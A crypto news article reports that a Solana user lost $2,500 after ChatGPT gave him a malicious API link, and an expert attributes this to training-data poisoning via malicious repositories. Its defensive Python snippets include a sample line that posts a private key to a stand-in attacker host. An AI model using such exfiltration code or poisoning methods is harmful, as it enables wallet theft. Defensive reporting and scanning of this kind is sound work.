Solana Exploit Reveals Risks of AI-Generated Code

A Solana user lost $2,500 after ChatGPT provided a malicious API link.

Glass skull emitting smoke and code in a desert.
Created by Gabor Kovacs from DailyCoin
  • A user lost $2,500 after using AI to code on Solana. 
  • ChatGPT provided a malicious API link.
  • The incident shows the risks of AI-generated code. 

Artificial intelligence (AI) is rapidly changing how people work, including how they program. AI's ability to generate code is seen as a way to streamline work for developers, and even to enable non-developers to create applications. However, AI-generated code also carries risks.

A recent incident revealed those risks in crypto. In what appears to be the first case of its kind, one user reported losing $2,500 after ChatGPT served malicious code for his Solana application.

AI-Generated Code Leads to Solana Wallet Exploit

On November 21, a user reported losing $2,500 while working on a bot for Solana's Pump.fun platform. The loss occurred after ChatGPT gave the user malicious code.

The user had asked ChatGPT for help with the code. However, the AI model provided a malicious API link, which redirected the user to a scam website. After the user submitted his private key to the API, the attackers quickly drained the wallet of its assets, including SOL and USDC.
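A simple defense against this class of attack is to refuse to send anything sensitive to an endpoint that has not been manually verified. The sketch below illustrates the idea with a hypothetical allowlist; the trusted hostname shown is Solana's public mainnet RPC host, and the scam URL is invented for illustration.

```python
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the developer has verified by hand
# against official documentation before ever sending them a request.
TRUSTED_HOSTS = {"api.mainnet-beta.solana.com"}

def is_trusted_endpoint(url: str) -> bool:
    """Return True only if the URL uses HTTPS and a pre-verified host."""
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname in TRUSTED_HOSTS

# An AI-suggested URL gets rejected unless it matches the allowlist.
print(is_trusted_endpoint("https://api.mainnet-beta.solana.com"))  # True
print(is_trusted_endpoint("https://solana-api.scam-example.com"))  # False
```

A check like this would not stop a poisoned dependency, but it would have blocked the redirect to the scam API in this incident, since the attacker's host would not appear on any manually verified list.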

Following the incident, the user flagged the attacker's wallet and reported the malicious code repository, hoping it would be taken down soon.

AI Poisoning Likely Culprit

Following the incident, security experts analyzed what happened. Yu Xian, the founder of the security firm SlowMist, noted that the user had run AI-generated code without verifying it.

Xian suggested that the likely explanation was AI poisoning: the deliberate insertion of malicious code into an AI's training data, typically through compromised or malicious repositories. It is a growing risk for AI users.

The incident reveals the dangers of trusting AI-generated code without independently verifying it. While AI can make coding more accessible, developers should verify what it produces before running it.

On the Flipside

  • AI poisoning could undermine the trust in using programs like ChatGPT, especially for coding. 
  • LLMs can provide inaccurate information even in tasks other than coding, which introduces risks for users. 

Why This Matters

The exploit reveals the risks of using AI-generated code in crypto, especially for inexperienced users. Users should verify the critical parts of the generated code before interacting with it. 
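One practical form of verification is to scan AI-generated code for red flags, such as private-key handling combined with outbound network calls, before executing it. The sketch below is a minimal, illustrative linter; the patterns are assumptions about what counts as suspicious, not an exhaustive or official checklist.

```python
import re

# Hypothetical red-flag patterns for a quick pre-run review of generated code.
RED_FLAGS = [
    r"private[_\s]?key",   # code touching raw private keys
    r"requests\.post\(",   # outbound network calls worth inspecting
    r"http://",            # unencrypted endpoints
]

def flag_suspicious_lines(source: str) -> list[tuple[int, str]]:
    """Return (line_number, line) pairs that match any red-flag pattern."""
    hits = []
    for n, line in enumerate(source.splitlines(), start=1):
        if any(re.search(p, line, re.IGNORECASE) for p in RED_FLAGS):
            hits.append((n, line.strip()))
    return hits

# A line like the one in this incident trips multiple patterns at once.
snippet = 'requests.post("http://evil.example/api", json={"privateKey": key})'
print(flag_suspicious_lines(snippet))
```

A match does not prove the code is malicious, but it tells the user exactly which lines deserve manual review before any private key goes anywhere near them.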

Read more about crypto hacks: 
12 Biggest Hacks in Crypto Exchange History

Read more about Solanaโ€™s latest performance: 
Solanaโ€™s All-Time High Gives Whales Millions in Profits

This article is for information purposes only and should not be considered trading or investment advice. Nothing herein shall be construed as financial, legal, or tax advice. Trading forex, cryptocurrencies, and CFDs pose a considerable risk of loss.

Author
David Marsanic

David Marsanic is DailyCoin's journalist, focusing on Solana and crypto exchanges. David currently doesn't hold any crypto.
